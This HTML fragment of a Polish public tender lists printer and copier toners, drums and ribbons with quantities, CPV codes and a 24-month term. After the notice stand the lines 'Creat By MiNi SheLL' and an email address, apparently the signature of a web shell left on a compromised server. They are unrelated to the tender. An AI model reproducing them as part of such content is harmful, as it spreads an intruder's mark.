<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Przedmiotem zamówienia są dostawy oryginalnych, fabrycznie nowych materiałów eksploatacyjnych, wyszczególnionych  niżej  2) Zamawiający nie dopuszcza materiałów zastępczych, z uwagi na zapisy warunków gwarancji producenta urządzeń do których są one przeznaczone, skutkujące utratą gwarancji w przypadku stosowania nieoryginalnych materiałów eksploatacyjnych. 3) Zamawiający nie dopuszcza przejmowania warunków gwarancji, o której mowa powyżej, przez Wykonawcę oferującego materiały zastępcze. 1. OKI B 410dn - toner Nr 43979102 ( 3 500 stron ) - 10 szt., bęben światłoczuły Nr 43979002 ( 25 000 stron ) - 4 szt. 2. OKI B 411dn - toner Nr 44574702 ( 3 000 stron ) - 5 szt., bęben światłoczuły Nr 44574302 ( 23 000 stron ) - 2 szt., 3. OKI B 4350 - toner Nr 01101202 ( 6 000 stron ) - 10 szt., bęben światłoczuły Nr 42102802 ( 25 000 stron ) - 5 szt. 4. OKI B 4400 /OKI B 4600 - toner Nr 43502302 ( 3 000 stron ) - 5 szt., bęben światłoczuły Nr 43501902 ( 20 000 stron ) - 4 szt. 5. OKI C 5300 n Nr 42403002 Rainbow Kit( 4 x 5 000 stron ) - 1 szt., bęben światłoczuły Nr 42126605 ( 17 000 stron ) - 1 szt., bęben światłoczuły Nr 42126606 ( 17 000 stron )- 1 szt., bęben światłoczuły Nr 42126607 ( 17 000 stron ) - 1 szt., bęben światłoczuły Nr 42126608 ( 17 000 stron ) - 1 szt. 6. OKI ES 5460- toner Nr 43865729 ( 6 000 stron ) - 2 szt., toner Nr 43865730 ( 6 000 stron ) - 2 szt., toner Nr 43865731 ( 6 000 stron ) - 2 szt., toner Nr 43865732 ( 8 000 stron ) - 2 szt., bęben światłoczuły Nr 1229301 ( 20 000 stron ) - 2 szt., bęben światłoczuły Nr 1229302 ( 20 000 stron ) - 2 szt., bęben światłoczuły Nr 1229303 ( 20 000 stron ) - 2 szt., bęben światłoczuły Nr 1229304 ( 20 000 stron ) - 2 szt., 7. OKI B 6200 / B 6250dn - toner Nr 09004078 ( 11 000 stron )- 25 szt., 8.OKI B 6300dn - toner Nr 09004079 ( 17 000 stron )- 180 szt., 9. OKI B 710 / 720 - toner Nr 01279001 ( 15 000 stron ) - 100 szt., 10. OKI C 830 -toner Nr 44059105 ( 8 000 stron ) - 4 szt., toner Nr 44059106 ( 8 000 stron ) - 4 szt., toner Nr 44059107 ( 8 000 stron ) - 4 szt., toner Nr 44059108 ( 8 000 stron )- 4 szt., bęben światłoczuły Nr 44064009 ( 20 000 stron )- 2 szt., bęben światłoczuły Nr 44064010 ( 20 000 stron ) - 2 szt., bęben światłoczuły Nr 44064011 ( 20 000 stron )- 2 szt., bęben światłoczuły Nr 44064012 ( 20 000 stron ) - 2 szt., 11. OKI MICROLINE 3321 kaseta z taśmą barwiącą Nr 09002303 ( 3 mln znaków ) - 50 szt., 12. HP LJ 1200- toner C7115X ( 3 500 stron )- 5 szt., 13. HP P3015- toner CE 255X ( 12 500 stron )- 20 szt., 14. HP LJ 4515x- toner CC364X ( 24 000 stron ) - 15szt., 15. Tally T 2155 kaseta z taśmą barwiącą Nr 062471 ( 20 mln znaków )- 10 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.00-2, 30.12.51.10-5, 30.19.23.20-0, 30.12.51.20-8, 30.12.43.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawy zastępczych lub regenerowanych tonerów i tuszów do drukarek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Przedmiotem zamówienia są dostawy zastępczych lub regenerowanych wkładów barwiących, fabrycznie nowych, odpowiadających wkładom wyszczególnionym w niżej  2) Oferowane wkłady barwiące muszą spełniać warunek bezkonfliktowej pracy z danym urządzeniem, w stopniu nie mniejszym niż wskazany z symbolu oryginał. 3) Oferowane wkłady barwiące powinny posiadać testy wydajności wg normy ISO 19752 dla tonerów monochromatycznych i normy ISO 24711 dla wkładów atramentowych, potwierdzające, że ich jakość i wydajność, jest nie gorsza niż ta, która gwarantuje wymieniony w tabeli produkt oryginalny. 1. HP 5L/6L/LJ 3150 - HP C3906A ( 2 500 stron )- 2 szt., 2. HP LJ 1100- HP C4092A ( 2 500 stron ) - 10 szt., 3. HP P 3015- CE 255X ( 12 500 stron )- 20 szt., 4. HP LJ 4050 - HP C4127X ( 10 000 stron )- 10 szt., 5. HP LJ 4100 - HP C8061X ( 10 000 stron )- 10 szt., 6. HP LJ 4515x- CC364X ( 24 000 stron ) - 8 szt., 7. HP 460 CB- HP 338 C8765EE ( 450 stron )- 15 szt., 8. HP P 2055 - CE505X ( 6500 stron )- 10 szt. 9. LEXMARK OPTRA T 620- Nr 12A6765 ( 30 000 stron ) - 5 szt., 10. OKI B 6100- Nr 09004058 ( 15 000 stron )- 10 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.00-2, 30.12.51.10-5, 30.19.23.20-0, 30.12.51.20-8, 30.12.43.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawy oryginalnych tonerów i tuszów do kserokopiarek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Przedmiotem zamówienia są dostawy oryginalnych, fabrycznie nowych materiałów eksploatacyjnych do kserokopiarek wyszczególnionych niżej  2) Zamawiający nie dopuszcza materiałów zastępczych, z uwagi na zapisy warunków gwarancji producenta urządzeń do których są one przeznaczone, skutkujące utratą gwarancji w przypadku stosowania nie oryginalnych materiałów eksploatacyjnych. 3) Zamawiający nie dopuszcza przejmowania warunków gwarancji, o której mowa powyżej, przez Wykonawcę oferującego materiały zastępcze. 1. RICOH VT 3500- VT 1000 ( 1000 ml ) - 4 szt., 2. KYOCERA - MITA KM - 1530, KYOCERA - MITA KM - 2030 - Kit KM 1530/2030 ( 11 000 stron ) - 50 szt., 3. KYOCERA - MITA Vi - 310 L - Kit Vi 230/230L/310/310L ( 10 000 stron )- 2 szt., 4. KYOCERA - MITA KM 1510 - Kit KM 1305/1510/1810 ( 7 000 stron ) - 4 szt., 5. KYOCERA - MITA KM - 2530, KYOCERA - MITA KM - 3035 - Kit KM 2530/3530/4030/3035/4035/5035 ( 34 000 stron )- 6 szt., 6. KYOCERA - MITA DC - 1460 - Kit DC 1460/1470 ( 7 000 stron ) - 8 szt., 7. KYOCERA - MITA TASKalfa 180 - TK - 435 ( 15 000 stron ) - 16 szt., 8. KYOCERA - MITA FS-1028 MFP - TK - 130 ( 7 200 stron ) - 6 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.00-2, 30.12.51.10-5, 30.19.23.20-0, 30.12.51.20-8, 30.12.43.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com